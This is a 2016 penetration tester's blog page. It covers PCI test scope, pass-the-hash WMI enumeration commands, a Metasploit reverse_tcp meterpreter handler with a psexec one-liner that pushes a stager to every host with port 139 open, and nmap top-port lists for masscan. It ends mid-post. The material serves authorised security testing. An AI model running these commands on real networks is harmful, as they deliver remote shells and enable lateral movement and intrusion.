Friday, June 24, 2016

Do You Need to Perform a Pen Test from Inside the CDE for PCI?



But what about Pen Testing from inside the CDE? Is that required?

PCI 3.x has no requirement to Pen Test from within the CDE. This is a common misunderstanding, propagated by a long-standing lack of guidance. With the March 2015 Information Supplement: Penetration Testing Guidance, we were finally able to address this directly: 

Scope
"It is not a requirement to test from within the CDE to the servers inside the CDE; and testing exclusively from within the CDE perimeter will not satisfy the requirement. However, when access to the CDE is obtained as a result of the testing, the penetration tester may elect to continue exploring inside the network and further the attack against other systems within the CDE, and may also include testing any data-exfiltration prevention (data-loss prevention) controls that are in place."

This is not a requirement and should only be done with care. When we have compromised the CDE of a organization, we will examine data-exfiltration controls and egress rules any time it is safe to do so. 

Hopefully this information can clear up any misconceptions about scanning and scope and what’s required for the latest version of the Standard.

Wednesday, June 22, 2016

Pen Test Enumeration with WMI

My client has disabled SMBv1/2 on the majority of their systems and that has made using many tools impossible. What I wanted was a netstat from each of the boxes to check connections, so I went down the WMI road looking for answers. That was a dead end, but I did discover some useful objects to query with WMI that might help your investigations. This requires WMI to be enabled, which was spotty on workstations but was enabled on all of my Client’s servers.

Find out who is logged onto the box
pth-wmic -U 'domain\username'%'Asdf1234' //10.128.192.84 "select * from Win32_LoggedOnUser"

Sysinfo  
pth-wmic -U 'domain\username'%'Asdf1234' //10.128.192.84 "select Buildtype from win32_operatingsystem"

Running Processes
pth-wmic -U 'domain\username'%'Asdf1234' //10.128.192.84 "select csname,name from win32_process"

Active Route
pth-wmic -U 'domain\username'%'Asdf1234' //10.128.192.84 "select * from Win32_ActiveRoute”

All the routes
pth-wmic -U 'domain\username'%'Asdf1234' //10.128.192.84 "select name from Win32_IP4RouteTable"

Because I can never remember the syntax 
for i in `cat /mnt/hgfs/PenTests/CLIENT/PortScans/10.445-1\all.txt`; do echo $i; pth-wmic -U 'domain\username'%'Asdf1234' //$i "select csname,name from win32_process"; done


If you have a better way or know of a way to pull a netstat without SMB enabled, please let me know in the comments.

Monday, June 20, 2016

Meterpreter over TCP/139


My Client has closed all but port 139 of the netbios ports, preventing me from using Metaplsoit’s PSEXEC. But, Mark Russinovich’s version from Microsoft will work just as well, albeit a hell of a lot slower.

Prep your loader following the instructions at https://github.com/rsmudge/metasploit-loader

Nmap all the 139 open ports and drop them into a file. Set up your handler. I use this with good success:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LPORT 4455
set LHOST  IPADDRESS
set EnableStageEncoding true
set AutoRunScript post/windows/manage/migrate
exploit -j –z


Download the original PSEXEC from Microsoft and run the following Windows script one-liner:

FOR /F %A IN (139.txt) DO psexec -s -u DOMAIN\user -p PASSWORD \\%A \\10.41.54.96\Share\stage.exe 


If you want to use this in a batch file, double up on the % for the variables, like FOR /F %%A IN… 

Using Masscan with Top Ports

Want to use masscan like nmap and scan just the “top ports”? A quick way of getting that list of ports is to run the following nmap command:

nmap -F -oG - 0.0.0.1 -v --top-ports N

Where N is the number of ports.

Example Top 100:
nmap -F -oG - 0.0.0.1 -v --top-ports 100

# Nmap 7.01 scan initiated Mon Jun 20 10:38:30 2016 as: nmap -F -oG - -v --top-ports 100 0.0.0.1
# Ports scanned: TCP(100;7,9,13,21-23,25-26,37,53,79-81,88,106,110-111,113,119,135,139,143-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,631,646,873,990,993,995,1025-1029,1110,1433,1720,1723,1755,1900,2000-2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000-6001,6646,7070,8000,8008-8009,8080-8081,8443,8888,9100,9999-10000,32768,49152-49157) UDP(0;) SCTP(0;) PROTOCOLS(0;)
setup_target: failed to determine route to 0.0.0.1
WARNING: No targets were specified, so 0 hosts scanned.
# Nmap done at Mon Jun 20 10:38:30 2016 -- 0 IP addresses (0 hosts up) scanned in 0.04 seconds 

Example Top 1000:
nmap -F -oG - 0.0.0.1 -v --top-ports 1000

# Nmap 7.01 scan initiated Mon Jun 20 10:38:45 2016 as: nmap -F -oG - -v --top-ports 1000 0.0.0.1
# Ports scanned: TCP(1000;1,3-4,6-7,9,13,17,19-26,30,32-33,37,42-43,49,53,70,79-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-1114,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,2869,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200,5214,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,5959-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-7938,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,16016,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,24800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,42510,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389) UDP(0;) SCTP(0;) PROTOCOLS(0;)
setup_target: failed to determine route to 0.0.0.1
WARNING: No targets were specified, so 0 hosts scanned.
# Nmap done at Mon Jun 20 10:38:45 2016 -- 0 IP addresses (0 hosts up) scanned in 0.05 seconds

See https://nmap.org/book/nmap-services.html for more information on how the top ports are determined.

Masscan: